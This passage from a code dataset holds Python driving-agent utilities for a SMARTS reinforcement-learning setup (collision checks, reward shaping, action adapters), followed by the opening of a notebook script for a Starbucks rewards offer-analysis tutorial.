np.array([-1.0, 0.0])\n else:\n base_angle = 0.0\n base_vec = np.array([1.0, 0.0])\n\n cos = vec.dot(base_vec) / np.sqrt(vec.dot(vec) + base_vec.dot(base_vec))\n angle = math.acos(cos)\n return angle + base_angle\n\n\n def _get_closest_vehicles(ego, neighbor_vehicles, n):\n ego_pos = ego.position[:2]\n groups = {i: (None, 1e10) for i in range(n)}\n partition_size = math.pi * 2.0 / n\n # get partition\n for v in neighbor_vehicles:\n v_pos = v.position[:2]\n rel_pos_vec = np.asarray([v_pos[0] - ego_pos[0], v_pos[1] - ego_pos[1]])\n if np.linalg.norm(rel_pos_vec) < 25.:\n # calculate its partitions\n angle = _cal_angle(rel_pos_vec)\n i = int(angle / partition_size)\n dist = np.sqrt(rel_pos_vec.dot(rel_pos_vec))\n if dist < groups[i][1]:\n groups[i] = (v, dist)\n\n return groups\n\n \n ego_state = env_obs.ego_vehicle_state\n neighbor_vehicle_states = env_obs.neighborhood_vehicle_states\n\n surrounding_vehicles = _get_closest_vehicles(ego_state, neighbor_vehicle_states, 8)\n ego_heading_vec = np.array([np.cos(-ego_state.heading), np.sin(-ego_state.heading)])\n \n neareat_vehicle =np.zeros((8, 5), dtype=np.float)\n for i, v in surrounding_vehicles.items():\n if v[0] is None:\n continue\n \n v = v[0]\n rel_pos = v.position[:2] - ego_state.position[:2]\n\n rel_dist = np.sqrt(rel_pos.dot(rel_pos))\n v_heading_vec = np.array([math.cos(-v.heading), math.sin(-v.heading)])\n\n ego_heading_norm_2 = ego_heading_vec.dot(ego_heading_vec)\n rel_pos_norm_2 = rel_pos.dot(rel_pos)\n v_heading_norm_2 = v_heading_vec.dot(v_heading_vec)\n ego_cosin = ego_heading_vec.dot(rel_pos) / np.sqrt(\n ego_heading_norm_2 + rel_pos_norm_2\n )\n\n v_cosin = v_heading_vec.dot(rel_pos) / np.sqrt(\n v_heading_norm_2 + rel_pos_norm_2\n )\n\n if ego_cosin <= 0 < v_cosin:\n rel_speed = 0\n else:\n rel_speed = ego_state.speed * ego_cosin - v.speed * v_cosin\n\n ttc = min(rel_dist / max(1e-5, rel_speed), 1e3)\n if ttc > 10.:\n ttc = 10.\n neareat_vehicle[i, :] = np.array(\n [rel_dist / 60., rel_speed / 120., ttc / 10., rel_pos[0] / 60., rel_pos[1] / 60.]\n )\n\n return neareat_vehicle.reshape((-1,))\n\n\"\"\"过滤保留180度扇形范围内的车的信息\n\"\"\"\ndef filter_neighborhood_vehicle_states(env_obs):\n ego_state = env_obs.ego_vehicle_state\n ego_position = ego_state.position[:2]\n ego_heading = ego_state.heading\n\n vehicle_list = []\n if env_obs.neighborhood_vehicle_states is None:\n return []\n else:\n for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n relative_position = neighborhood_vehicle_position - ego_position\n alpha = np.arctan2(-relative_position[0], relative_position[1])\n if abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5:\n vehicle_list.append(neighborhood_vehicle_state)\n\n return vehicle_list\n\n\"\"\"检测wp点是否已经与neighborhood小车相交\n\"\"\"\ndef point_in_neighbor_vehicle(env_obs, point, neighborhood_vehicle_states):\n\n if len(neighborhood_vehicle_states) == 0:\n return False\n else:\n for neighborhood_vehicle_state in neighborhood_vehicle_states:\n neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n neighborhood_vehicle_bounding_box = np.array([neighborhood_vehicle_state.bounding_box.length, neighborhood_vehicle_state.bounding_box.width])\n\n neighborhood_vehicle_corner_positions = get_ego_position(neighborhood_vehicle_position,\n neighborhood_vehicle_heading,\n neighborhood_vehicle_bounding_box,)\n\n p = Path(neighborhood_vehicle_corner_positions)\n if p.contains_point(point):\n return True\n \n return False\n\n\n\"\"\"检测变道是否安全\n\"\"\"\ndef safety_detect(env_obs, target_lane, current_lane):\n\n def get_backward_wp(pos, heading):\n heading_cosine = np.cos(-heading)\n heading_sine = np.sin(-heading)\n l = [i for i in range(13)]\n h = 1\n\n wp = []\n for l_ in l:\n wp.append(pos + np.array([\n -h / 2 * heading_cosine + -l_ * heading_sine,\n -l_ * heading_cosine - -h / 2 * heading_sine]).reshape(-1))\n wp.append(pos + np.array([\n h / 2 * heading_cosine + -l_ * heading_sine,\n -l_ * heading_cosine - +h / 2 * heading_sine]).reshape(-1))\n return np.array(wp)\n \n # 如果没有改变赛道,则判定安全\n if target_lane == current_lane:\n return True\n\n wp_paths = env_obs.waypoint_paths\n if target_lane >= len(wp_paths) or current_lane >= len(wp_paths):\n lane_list = [0]\n else:\n lane_list = [i for i in range(min(target_lane, current_lane), max(target_lane, current_lane)+1)]\n lane_list.remove(current_lane)\n\n for i in lane_list:\n wp_pos_target_lane = wp_paths[i][0].pos\n wp_heading_target_lane = wp_paths[i][0].heading\n backward_wps = get_backward_wp(wp_pos_target_lane, wp_heading_target_lane)\n\n vehicle_list = []\n if env_obs.neighborhood_vehicle_states is None:\n return []\n else:\n for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n if np.linalg.norm(neighborhood_vehicle_position - wp_pos_target_lane) < 20:\n vehicle_list.append(neighborhood_vehicle_state)\n \n # 后向检测\n for backward_wp in backward_wps:\n if point_in_neighbor_vehicle(env_obs, backward_wp, vehicle_list):\n return False\n \n # 前向检测\n length = len(wp_paths[i])\n forward_wps = [ wp_paths[i][j].pos for j in range(min(12, length))]\n for forward_wp in forward_wps:\n if point_in_neighbor_vehicle(env_obs, forward_wp, vehicle_list):\n return False\n\n return True\n\n\"\"\"计算离我最近的车的距离,及方向\n\"\"\"\ndef get_min_dist(env_obs):\n\n ego_state = env_obs.ego_vehicle_state\n ego_position = ego_state.position[:2]\n ego_heading = ego_state.heading\n ego_bounding_box = np.array([ego_state.bounding_box.length,\n ego_state.bounding_box.width])\n\n ego_corner = get_ego_position(ego_position, \n ego_heading, \n ego_bounding_box)\n ego_line = LineString([ego_corner[0], \n ego_corner[1], \n ego_corner[2], \n ego_corner[3], \n ego_corner[0]])\n\n min_dist = 5\n min_dist_rleative_heading = 0\n neighborhood_vehicle_states = filter_neighborhood_vehicle_states(env_obs)\n if len(neighborhood_vehicle_states) == 0:\n pass\n else:\n for neighborhood_vehicle_state in neighborhood_vehicle_states:\n neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n neighborhood_vehicle_bounding_box = np.array([neighborhood_vehicle_state.bounding_box.length, neighborhood_vehicle_state.bounding_box.width])\n\n\n if np.linalg.norm(neighborhood_vehicle_position-ego_position) < 10.0:\n neighborhood_vehicle_corner = get_ego_position(neighborhood_vehicle_position, \n neighborhood_vehicle_heading, \n neighborhood_vehicle_bounding_box)\n \n neighborhood_vehicle_line = LineString([neighborhood_vehicle_corner[0], \n neighborhood_vehicle_corner[1], \n neighborhood_vehicle_corner[2], \n neighborhood_vehicle_corner[3], \n neighborhood_vehicle_corner[0]])\n\n distance = ego_line.distance(neighborhood_vehicle_line)\n if min_dist > distance:\n relative_position = neighborhood_vehicle_position - ego_position\n alpha = np.arctan2(-relative_position[0], relative_position[1])\n if abs(alpha - ego_heading) < np.pi / 3 or abs(alpha - ego_heading) > np.pi * 5 / 3:\n if (abs(neighborhood_vehicle_heading - ego_heading) > 0.2 and abs(neighborhood_vehicle_heading - ego_heading) < (np.pi*2 - 0.2)) or \\\n (ego_state.lane_id == neighborhood_vehicle_state.lane_id):\n min_dist = distance\n min_dist_rleative_heading = alpha\n\n return min_dist, min_dist_rleative_heading\n\n\n\"\"\"计算每辆车的意图\n\"\"\"\ndef threaten_via_intent(env_obs, max_len_index):\n def get_neighborhood_wp(pos, heading, speed):\n heading_cosine = np.cos(-heading)\n heading_sine = np.sin(-heading)\n\n # 前向计算\n l = [i for i in range(15+int(speed*2))]\n h = 0.8\n\n wp = []\n for l_ in l:\n wp.append((pos + np.array([\n -h / 2 * heading_cosine + l_ / 2 * heading_sine,\n l_ / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n wp.append((pos + np.array([\n h / 2 * heading_cosine + l_ / 2 * heading_sine,\n l_ / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n \n # 后向计算(为了报这个车的size包括进来)\n l = [i for i in range(1, 4)]\n for l_ in l:\n wp.append((pos + np.array([\n -h / 2 * heading_cosine + -l_ / 2 * heading_sine,\n -l_ / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n wp.append((pos + np.array([\n h / 2 * heading_cosine + -l_ / 2 * heading_sine,\n -l_ / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n \n return np.concatenate(wp, axis=0)\n \n def get_ego_forward_wp(wps, max_i=20):\n l = 0.05\n h = 0.8\n\n forward_wps = []\n i = 1\n for wp in wps:\n heading_cosine = np.cos(-wp.heading)\n heading_sine = np.sin(-wp.heading)\n pos = wp.pos\n\n forward_wps.append((pos + np.array([\n -h / 2 * heading_cosine + l / 2 * heading_sine,\n l / 2 * heading_cosine - -h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n forward_wps.append((pos + np.array([\n h / 2 * heading_cosine + l / 2 * heading_sine,\n l / 2 * heading_cosine - h / 2 * heading_sine]).reshape(-1)).reshape(1, -1))\n\n i += 1\n if i > max_i:\n break\n \n return np.concatenate(forward_wps, axis=0)\n\n def get_min_value_and_index(matrix, limit=2.0):\n shape = matrix.shape[0]\n for i in range(shape):\n if matrix[i] < limit:\n return matrix[i], i // 2\n \n if i == shape-1:\n return 10, 20\n\n\n ego_state = env_obs.ego_vehicle_state\n ego_position = ego_state.position[:2]\n ego_heading = ego_state.heading\n if max_len_index >= len(env_obs.waypoint_paths):\n max_len_index = len(env_obs.waypoint_paths) - 1\n ego_path = env_obs.waypoint_paths[max_len_index]\n ego_forward_wps = get_ego_forward_wp(ego_path)\n\n intend_min_index_min = 20\n intend_min_index_head_min = 20\n intend_min_index_teal_min = 20\n if env_obs.neighborhood_vehicle_states is None:\n return []\n else:\n for neighborhood_vehicle_state in env_obs.neighborhood_vehicle_states:\n neighborhood_vehicle_position = neighborhood_vehicle_state.position[:2]\n if np.linalg.norm(neighborhood_vehicle_position - ego_position) < 30:\n \"\"\"计算同车道的车辆离我的最短距离\n \"\"\"\n if ego_state.lane_id == neighborhood_vehicle_state.lane_id:\n relative_position = neighborhood_vehicle_position - ego_position\n alpha = np.arctan2(-relative_position[0], relative_position[1])\n\n # 计算前方最短距离\n if abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5:\n neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n neighborhood_vehicle_speed = neighborhood_vehicle_state.speed\n\n neighborhood_forward_wps = get_neighborhood_wp(neighborhood_vehicle_position,\n neighborhood_vehicle_heading,\n neighborhood_vehicle_speed)\n \n intent_distance = np.linalg.norm(ego_forward_wps[:, np.newaxis] - neighborhood_forward_wps, axis=-1)\n intent_distance = np.min(intent_distance, axis=-1)\n intend_min_distance, intend_min_index = get_min_value_and_index(intent_distance, limit=2.0)\n\n if intend_min_distance < 2.0:\n if intend_min_index < intend_min_index_head_min:\n intend_min_index_head_min = intend_min_index \n \n # 计算后方最短距离\n else:\n distance = np.linalg.norm(relative_position)\n if distance < intend_min_index_teal_min:\n intend_min_index_teal_min = distance\n\n continue\n\n\n neighborhood_vehicle_heading = neighborhood_vehicle_state.heading\n neighborhood_vehicle_speed = neighborhood_vehicle_state.speed\n\n neighborhood_forward_wps = get_neighborhood_wp(neighborhood_vehicle_position,\n neighborhood_vehicle_heading,\n neighborhood_vehicle_speed)\n \n intent_distance = np.linalg.norm(ego_forward_wps[:, np.newaxis] - neighborhood_forward_wps, axis=-1)\n intent_distance = np.min(intent_distance, axis=-1)\n intend_min_distance, intend_min_index = get_min_value_and_index(intent_distance, limit=2.0)\n\n if intend_min_distance < 2.0:\n # 排除我们后面的车(我们的先验在于如果他在我们后面快撞到我们,那减速也是没有意义的)(但是要除去距离较近的)\n relative_position = neighborhood_vehicle_position - ego_position\n alpha = np.arctan2(-relative_position[0], relative_position[1])\n if not(abs(alpha - ego_heading) < np.pi / 2 or abs(alpha - ego_heading) > np.pi * 1.5):\n continue\n\n # 排除离我跨车道的情况\n if ego_state.lane_id.split('_')[0] == neighborhood_vehicle_state.lane_id.split('_')[0] \\\n and abs(ego_state.lane_index - neighborhood_vehicle_state.lane_index) > 1:\n continue\n \n # 不动的车排除\n if neighborhood_vehicle_state.speed < 0.05:\n continue\n\n if intend_min_index < intend_min_index_min:\n intend_min_index_min = intend_min_index\n \n # 这个数越小越危险\n threaten_level = 1.\n if intend_min_index_min > 20:\n threaten_level = 1.\n else:\n threaten_level = float(intend_min_index_min / 20)\n\n head_threaten_level = 1.\n if intend_min_index_head_min > 20:\n head_threaten_level = 1.\n else:\n head_threaten_level = float(intend_min_index_head_min / 20)\n\n teal_threaten_level = 1.\n if intend_min_index_teal_min > 20:\n teal_threaten_level = 1.\n else:\n teal_threaten_level = float(intend_min_index_teal_min / 20)\n \n return threaten_level, head_threaten_level, teal_threaten_level\n \n\"\"\"计算小车要走的轨迹点\n\"\"\"\ndef get_max_index_lane(env_obs):\n global global_max_len_lane_index\n\n if env_obs.distance_travelled == 0.0:\n global_max_len_lane_index = 0\n\n wp_paths = env_obs.waypoint_paths\n wp_paths_len = len(wp_paths)\n\n wps_len = [len(path) for path in wp_paths]\n max_len_lane_index = np.argmax(wps_len)\n max_len = np.max(wps_len)\n max_count = wps_len.count(max_len)\n\n if max_count == 1:\n\n if safety_detect(env_obs, max_len_lane_index, env_obs.ego_vehicle_state.lane_index):\n global_max_len_lane_index = max_len_lane_index\n return max_len_lane_index\n else:\n if global_max_len_lane_index >= wp_paths_len:\n global_max_len_lane_index = wp_paths_len - 1\n return global_max_len_lane_index\n\n # 只算当前车道临近的车道\n max_ids = [i for i, d in enumerate(wps_len) if d == max_len]# if abs(i-env_obs.ego_vehicle_state.lane_index) <= 1 ]\n # 如果最长赛道不止一个,而且都不在我附近,这种情况应该很少出现吧\n if len(max_ids) == 0:\n global_max_len_lane_index = max_len_lane_index\n return max_len_lane_index\n\n\n neighborhood_vehicle_states = filter_neighborhood_vehicle_states(env_obs)\n \n for i in range(max_len):\n if len(max_ids) == 1:\n\n if safety_detect(env_obs, max_ids[0], env_obs.ego_vehicle_state.lane_index):\n global_max_len_lane_index = max_ids[0]\n return max_ids[0]\n else:\n return global_max_len_lane_index\n\n for max_id in max_ids:\n if point_in_neighbor_vehicle(env_obs, wp_paths[max_id][i].pos, neighborhood_vehicle_states):\n max_ids.remove(max_id)\n\n if global_max_len_lane_index in max_ids:\n return global_max_len_lane_index\n else:\n i = 1\n while True:\n if min(global_max_len_lane_index+i, wp_paths_len-1) in max_ids:\n\n if safety_detect(env_obs, global_max_len_lane_index+i, env_obs.ego_vehicle_state.lane_index):\n global_max_len_lane_index += i \n return global_max_len_lane_index\n else:\n return global_max_len_lane_index\n\n elif max(global_max_len_lane_index-i, 0) in max_ids:\n\n if safety_detect(env_obs, global_max_len_lane_index-i, env_obs.ego_vehicle_state.lane_index):\n global_max_len_lane_index -= i\n return global_max_len_lane_index\n else:\n return global_max_len_lane_index\n i += 1\n\ndef detect_genJ(sample_wp_path):\n for wp in sample_wp_path:\n if 'gneJ' in wp.lane_id:\n return True\n return False\n\ndef detect_int_in_genJ(sample_wp_path, index):\n if index >= len(sample_wp_path):\n index = len(sample_wp_path) - 1\n\n\n if 'gneJ' in sample_wp_path[index].lane_id:\n return True\n else:\n return False\n\n\nfrom smarts.core.sensors import Observation\nfrom process import *\nfrom map.map import GridMap\n\ncbf_obs = CBFObservation()\nlinemap = GridMap.load(dir=\"map\", name=\"mid\")\nsidemap1 = GridMap.load(dir=\"map\", name=\"sidemap1\")\nsidemap2 = GridMap.load(dir=\"map\", name=\"sidemap2\")\n\n\ndef obs_Frenet(obs:Observation):\n cbf_obs(obs)\n return cbf_obs\n\ndef observation_adapter(env_obs:Observation):\n \"\"\"\n Transform the environment's observation into something more suited for your model\n \"\"\"\n # CBF information\n cbf_obs = obs_Frenet(env_obs)\n position = cbf_obs.ego.p\n cxe, cye, re = linemap.curvature(position[0], position[1], size=[10, 10])\n cbf_obs.r = re\n cbf_obs.cxe = cxe\n cbf_obs.cye = cye\n # linemap.show3circle(\n # linemap.grid, sidemap1.grid, sidemap2.grid, [cxe, cye], re, cbf_obs\n # )\n\n min_dist, min_dist_rleative_heading = get_min_dist(env_obs)\n detect_car = detect_sector_car(env_obs)\n\n\n global global_last_len_wps_len\n if env_obs.distance_travelled == 0.0:\n global_last_len_wps_len = len(env_obs.waypoint_paths)\n\n global global_in_genJ\n global_in_genJ = 'gneJ' in env_obs.ego_vehicle_state.lane_id\n # ================================================================\n # normal info build\n # ================================================================\n ego_state = env_obs.ego_vehicle_state\n wp_paths = env_obs.waypoint_paths\n closest_wps = [path[0] for path in wp_paths]\n\n # distance of vehicle from center of lane\n closest_wp = min(closest_wps, key=lambda wp: wp.dist_to(ego_state.position))\n signed_dist_from_center = closest_wp.signed_lateral_error(ego_state.position)\n lane_hwidth = closest_wp.lane_width * 0.5\n norm_dist_from_center = signed_dist_from_center / lane_hwidth\n\n\n ego_lane_index = closest_wp.lane_index\n\n # ================================================================\n # lane info build\n # ================================================================\n (\n lane_ttc,\n lane_dist,\n closest_lane_nv_rel_speed,\n intersection_ttc,\n intersection_distance,\n closest_its_nv_rel_speed,\n closest_its_nv_rel_pos,\n ) = ttc_by_path(\n ego_state, wp_paths, env_obs.neighborhood_vehicle_states, closest_wp\n )\n\n # ================================================================\n # heading info build\n # ================================================================\n # wp heading errors in current lane in front of vehicle\n indices = np.array([0, 1, 2, 3, 5, 8, 13, 21, 34, 50])\n\n # solve case that wps are not enough, then assume the left heading to be same with the last valid.\n wps_len = [len(path) for path in wp_paths]\n max_len_lane_index = get_max_index_lane(env_obs)\n\n last_wp_index = 0\n for i, wp_index in enumerate(indices):\n if wp_index > wps_len[max_len_lane_index] - 1:\n indices[i:] = last_wp_index\n break\n last_wp_index = wp_index\n\n global global_sample_wp_path\n global_sample_wp_path = [wp_paths[max_len_lane_index][i] for i in indices]\n heading_errors = [\n math.sin(wp.relative_heading(ego_state.heading)) for wp in global_sample_wp_path\n ]\n\n # 防止多产生道路实index突变\n global global_max_len_lane_index\n len_wps_len = len(wps_len)\n if len_wps_len > global_last_len_wps_len:\n global_max_len_lane_index = env_obs.ego_vehicle_state.lane_index\n global_last_len_wps_len = len_wps_len\n\n global global_max_len_lane\n global_max_len_lane = wps_len[max_len_lane_index]\n \n wp_errors = np.array([wp.signed_lateral_error(ego_state.position) for wp in global_sample_wp_path])[:4]\n \n is_genJ = detect_genJ(global_sample_wp_path)\n\n wp_speed_limit = np.min(np.array([wp.speed_limit for wp in global_sample_wp_path]) / 120.) * 1.065\n \n if is_genJ:\n wp_speed_limit *= 0.9\n if wp_speed_limit > 0.19167:\n wp_speed_limit = 0.19167\n\n global global_lane_ttc\n lane_ttc, lane_dist = ego_ttc_calc(ego_lane_index, lane_ttc, lane_dist)\n global_lane_ttc = lane_ttc[2]\n\n global threaten_distance\n global head_threaten_distance\n global teal_threaten_distance\n threaten_distance, head_threaten_distance, teal_threaten_distance = threaten_via_intent(env_obs, env_obs.ego_vehicle_state.lane_index)\n # print(threaten_distance)\n # print(head_threaten_distance)\n # print(teal_threaten_distance)\n # print()\n # print(ego_state.speed)\n global global_int_in_gneJ\n global_int_in_gneJ = detect_int_in_genJ(wp_paths[max_len_lane_index], int(threaten_distance*20)-1)\n\n\n return {\n \"distance_from_center\": np.array([norm_dist_from_center]),\n \"heading_errors\": np.array(heading_errors),\n \"wp_errors\": wp_errors,\n \"wp_speed_penalty\": np.array([wp_speed_limit]),\n \"speed\": np.array([ego_state.speed / 120.]),\n \"steering\": np.array([ego_state.steering / (0.5 * math.pi)]),\n \"lane_ttc\": np.array(lane_ttc),\n \"lane_dist\": np.array(lane_dist),\n \"closest_lane_nv_rel_speed\": np.array([closest_lane_nv_rel_speed]),\n \"intersection_ttc\": np.array([intersection_ttc]),\n \"intersection_distance\": np.array([intersection_distance]),\n \"closest_its_nv_rel_speed\": np.array([closest_its_nv_rel_speed]),\n \"closest_its_nv_rel_pos\": np.array(closest_its_nv_rel_pos),\n \"min_dist\": np.array([min_dist / 5.0, min_dist_rleative_heading/ (np.pi * 2)]),\n \"detect_car\": detect_car,\n \"threaten_distance\": np.array([threaten_distance, head_threaten_distance, teal_threaten_distance]),\n \"cbf_obs\": cbf_obs\n }\n\n# ==================================================\n# reward function\n# ==================================================\ndef reward_adapter(env_obs, env_reward):\n \"\"\"\n Here you can perform your reward shaping.\n\n The default reward provided by the environment is the increment in\n distance travelled. Your model will likely require a more\n sophisticated reward function\n \"\"\"\n global lane_crash_flag\n distance_from_center = get_distance_from_center(env_obs)\n\n center_penalty = -np.abs(distance_from_center)\n\n # penalise close proximity to lane cars\n if lane_crash_flag:\n crash_penalty = -5\n else:\n crash_penalty = 0\n\n # penalise close proximity to intersection cars\n if intersection_crash_flag:\n crash_penalty -= 5\n\n total_reward = np.sum([1.0 * env_reward])\n total_penalty = np.sum([0.1 * center_penalty, 1 * crash_penalty])\n\n speed = env_obs.ego_vehicle_state.speed\n\n global global_sample_wp_path\n is_genJ = detect_genJ(global_sample_wp_path)\n wp_speed_limit = np.min(np.array([wp.speed_limit for wp in global_sample_wp_path]) ) * 1.065\n if is_genJ:\n wp_speed_limit *= 0.9\n if wp_speed_limit > 23:\n wp_speed_limit = 23\n speed_penalty = 0.0\n if speed > wp_speed_limit:\n speed_penalty = -1.0 * (speed - wp_speed_limit) * 0.3\n\n reach_goal_reward = 0.\n if env_obs.events.reached_goal:\n reach_goal_reward = 50.\n\n # 安全保证\n global threaten_distance\n global head_threaten_distance\n global teal_threaten_distance\n safety_penalty = 0.\n if threaten_distance < 0.56:\n safety_penalty -= (0.56 - threaten_distance) * 1.0\n if head_threaten_distance < 0.5: \n safety_penalty -= (0.5 - head_threaten_distance) * 1.0\n if teal_threaten_distance < 0.5:\n safety_penalty -= (0.5 - teal_threaten_distance) * 1.0\n\n # 安全保证2,wps_len小的化,应该减速等车过去然后变道\n global global_max_len_lane\n\n safety_penalty_2 = 0.\n if global_max_len_lane < 45:\n safety_penalty_2 = speed-4. if speed >= 4. else 0.\n if global_max_len_lane < 30:\n safety_penalty_2 = speed-2. if speed >= 2. else 0.\n if global_max_len_lane < 15:\n safety_penalty_2 = speed\n safety_penalty_2 *= -0.5\n\n # 安全保证3 lane_ttc要大于一定值,保证安全\n global global_lane_ttc\n\n safety_penalty_3 = 0.\n if global_lane_ttc < 0.3:\n safety_penalty_3 = (global_lane_ttc - 0.3) * 2.0\n \n\n # safety_penalty_4 = 0.\n # if threaten_distance < 0.86:\n # safety_penalty_4 = speed-9. if speed >= 9. else 0.\n # if threaten_distance < 0.66:\n # safety_penalty_4 = speed-6. if speed >= 6. else 0.\n # if threaten_distance < 0.46:\n # safety_penalty_4 = speed-3. if speed >= 3. else 0.\n # if threaten_distance < 0.26:\n # safety_penalty_4 = speed-1. if speed >= 1. else 0.\n # safety_penalty_4 *= -1.0\n # safety_penalty_4 = np.clip(safety_penalty_4, -3, 0)\n\n return (total_reward + \n total_penalty + \n speed_penalty + \n reach_goal_reward# + \n #safety_penalty + \n #safety_penalty_2 + \n #safety_penalty_3 #+ \n #safety_penalty_4\n ) / 100.0 # 加一个时间惩罚系数\n\ndef action_adapter(model_action):\n assert len(model_action) == 2\n\n global threaten_distance\n global head_threaten_distance\n throttle = np.clip(model_action[0], 0, 1)\n brake = np.abs(np.clip(model_action[0], -1, 0))\n\n # global global_in_genJ\n\n global global_int_in_gneJ\n global global_max_len_lane\n\n if global_max_len_lane < 20:\n brake = 0.5\n\n if global_int_in_gneJ:\n if threaten_distance < 0.66:\n throttle = 0.\n brake = 1.\n if threaten_distance < 0.1:\n throttle = 0.\n brake = 1.\n\n if head_threaten_distance < 0.26:\n throttle = 0.\n brake = 1.\n\n #print(np.asarray([throttle, brake, model_action[1]]))\n return np.asarray([throttle, brake, model_action[1]])\n\n\ndef info_adapter(observation, reward, info):\n return info\n\n\nagent_interface = AgentInterface(\n max_episode_steps=None,\n waypoints=True,\n neighborhood_vehicles=NeighborhoodVehicles(radius=60),\n action=ActionSpaceType.Continuous, #LaneWithContinuousSpeed\n)\n\nagent_spec = AgentSpec(\n interface=agent_interface,\n observation_adapter=observation_adapter,\n reward_adapter=reward_adapter,\n action_adapter=action_adapter,\n info_adapter=info_adapter,\n)","repo_name":"Link2Link/MAC-CBF-RL","sub_path":"algos/utils/smarts_utils.py","file_name":"smarts_utils.py","file_ext":"py","file_size_in_byte":49605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"13035859003","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport os\nproject_name = \"reco-tut-sor\"; branch = \"main\"; account = \"sparsh-ai\"\nproject_path = os.path.join('/content', project_name)\n\n\n# In[ ]:\n\n\nif not os.path.exists(project_path):\n get_ipython().system(u'cp /content/drive/MyDrive/mykeys.py /content')\n import mykeys\n get_ipython().system(u'rm /content/mykeys.py')\n path = \"/content/\" + project_name; \n get_ipython().system(u'mkdir \"{path}\"')\n get_ipython().magic(u'cd \"{path}\"')\n import sys; sys.path.append(path)\n get_ipython().system(u'git config --global user.email \"recotut@recohut.com\"')\n get_ipython().system(u'git config --global user.name \"reco-tut\"')\n get_ipython().system(u'git init')\n get_ipython().system(u'git remote add origin https://\"{mykeys.git_token}\":x-oauth-basic@github.com/\"{account}\"/\"{project_name}\".git')\n get_ipython().system(u'git pull origin \"{branch}\"')\n get_ipython().system(u'git checkout main')\nelse:\n get_ipython().magic(u'cd \"{project_path}\"')\n\n\n# In[103]:\n\n\nget_ipython().system(u'git status')\n\n\n# In[104]:\n\n\nget_ipython().system(u'git add . && git commit -m \\'commit\\' && git push origin \"{branch}\"')\n\n\n# ---\n\n# This data set contains simulated data that mimics customer behavior on the Starbucks rewards mobile app. Once every few days, Starbucks sends out an offer to users of the mobile app. An offer can be merely an advertisement for a drink or an actual offer such as a discount or BOGO (buy one get one free). Some users might not receive any offer during certain weeks.\n# \n# Not all users receive the same offer, and that is the challenge to solve with this data set.\n# \n# The task is to combine transaction, demographic and offer data to determine which demographic groups respond best to which offer type. This data set is a simplified version of the real Starbucks app because the underlying simulator only has one product whereas Starbucks actually sells dozens of products.\n# \n# Every offer has a validity period before the offer expires. As an example, a BOGO offer might be valid for only 5 days. You'll see in the data set that informational offers have a validity period even though these ads are merely providing information about a product; for example, if an informational offer has 7 days of validity, you can assume the customer is feeling the influence of the offer for 7 days after receiving the advertisement.\n# \n# The provided transactional data shows user purchases made on the app including the timestamp of purchase and the amount of money spent on a purchase. This transactional data also has a record for each offer that a user receives as well as a record for when a user actually views the offer. There are also records for when a user completes an offer.\n# \n# Let's keep in mind as well that someone using the app might make a purchase through the app without having received an offer or seen an offer.\n# \n# To give an example, a user could receive a discount offer buy 10 dollars get 2 off on Monday. The offer is valid for 10 days from receipt. If the customer accumulates at least 10 dollars in purchases during the validity period, the customer completes the offer.\n# \n# However, there are a few things to watch out for in this data set. Customers do not opt into the offers that they receive; in other words, a user can receive an offer, never actually view the offer, and still complete the offer. For example, a user might receive the \"buy 10 dollars get 2 dollars off offer\", but the user never opens the offer during the 10 day validity period. The customer spends 15 dollars during those ten days. There will be an offer completion record in the data set; however, the customer was not influenced by the offer because the customer never viewed the offer.\n# \n# You'll also want to take into account that some demographic groups will make purchases even if they don't receive an offer. From a business perspective, if a customer is going to make a 10 dollar purchase without an offer anyway, you wouldn't want to send a buy 10 dollars get 2 dollars off offer. You'll want to try to assess what a certain demographic group will buy when not receiving any offers.\n\n# ## Dataset\n# \n# The data is contained in three files:\n# \n# * portfolio.json - containing offer ids and meta data about each offer (duration, type, etc.)\n# * profile.json - demographic data for each customer\n# * transcript.json - records for transactions, offers received, offers viewed, and offers completed\n# \n# Here is the schema and explanation of each variable in the files:\n# \n# **portfolio.json**\n# * id (string) - offer id\n# * offer_type (string) - type of offer ie BOGO, discount, informational\n# * difficulty (int) - minimum required spend to complete an offer\n# * reward (int) - reward given for completing an offer\n# * duration (int) - time for offer to be open, in days\n# * channels (list of strings)\n# \n# **profile.json**\n# * age (int) - age of the customer \n# * became_member_on (int) - date when customer created an app account\n# * gender (str) - gender of the customer (note some entries contain 'O' for other rather than M or F)\n# * id (str) - customer id\n# * income (float) - customer's income\n# \n# **transcript.json**\n# * event (str) - record description (ie transaction, offer received, offer viewed, etc.)\n# * person (str) - customer id\n# * time (int) - time in hours since start of test. The data begins at time t=0\n# * value - (dict of strings) - either an offer id or transaction amount depending on the record\n\n# In[ ]:\n\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport math\nimport json\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nget_ipython().magic(u'matplotlib inline')\n\n\n# In[60]:\n\n\n# read in the json files\nportfolio = pd.read_json('./data/bronze/portfolio.json', orient='records', lines=True)\nprofile = pd.read_json('./data/bronze/profile.json', orient='records', lines=True)\ntranscript = pd.read_json('./data/bronze/transcript.json', orient='records', lines=True)\n\n\n# ## Portfolio\n\n# | attribute | description |\n# | --------- | ----------- |\n# | id | offer id |\n# | offer_type | type of offer ie BOGO, discount, informational |\n# | difficulty | minimum required spend to complete an offer |\n# | 